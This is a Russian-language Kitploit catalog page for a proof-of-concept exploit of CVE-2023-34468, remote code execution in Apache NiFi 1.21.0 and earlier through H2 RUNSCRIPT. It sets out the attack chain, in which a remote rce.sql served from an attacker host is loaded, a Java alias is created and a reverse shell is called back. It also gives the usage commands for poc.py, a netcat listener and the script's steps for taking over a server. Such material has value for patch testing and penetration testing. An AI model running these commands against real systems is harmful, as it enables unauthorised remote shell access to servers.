Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/0xsoulaimane/cve-2023-34468-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHub0xsoulaimane/cve-2023-34468-poc

CVE-2023-34468-POC

PoC-эксплойт для CVE-2023-34468 — RCE через H2 RUNSCRIPT в Apache NiFi <= 1.21.0

Репозиторий
44 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Удалённое выполнение кода через H2 Database RUNSCRIPT в Apache NiFi <= 1.21.0


Уязвимость

Apache NiFi по умолчанию поставляется с JAR-файлом базы данных H2. Службу контроллера DBCPConnectionPool можно настроить на использование этого драйвера H2. H2 поддерживает оператор RUNSCRIPT, который загружает и выполняет SQL-файл с удалённого URL. Этот SQL-файл может определять произвольный Java-код через CREATE ALIAS и выполнять его в ОС сервера.

Цепочка атаки:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

Уязвимые версии

SoftwareVersion
Apache NiFi<= 1.21.0
Fixed in1.21.1+
JavaAny (bundled)

Требования

  • Python 3.x
  • Библиотека requests → pip install requests
  • Целевой NiFi с анонимным доступом на запись ИЛИ действительные учётные данные
  • Сетевой доступ с целевой машины к вашей машине (для обратного подключения reverse shell)

Использование

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

Аргументы

ArgumentDefaultDescription
--targethttp://NiFi.target.comTarget NiFi base URL
--lhost10.10.10.10Your IP (tun0)
--lport4444Reverse shell listener port
--http-port80Port to serve rce.sql
--cleanupFalseDelete created artifacts after run

Настройка

Терминал 1 — слушатель:

root@kitploit:~
nc -lvnp 4444

Терминал 2 — эксплуатация:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

Что делает PoC

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
Скачать инструмент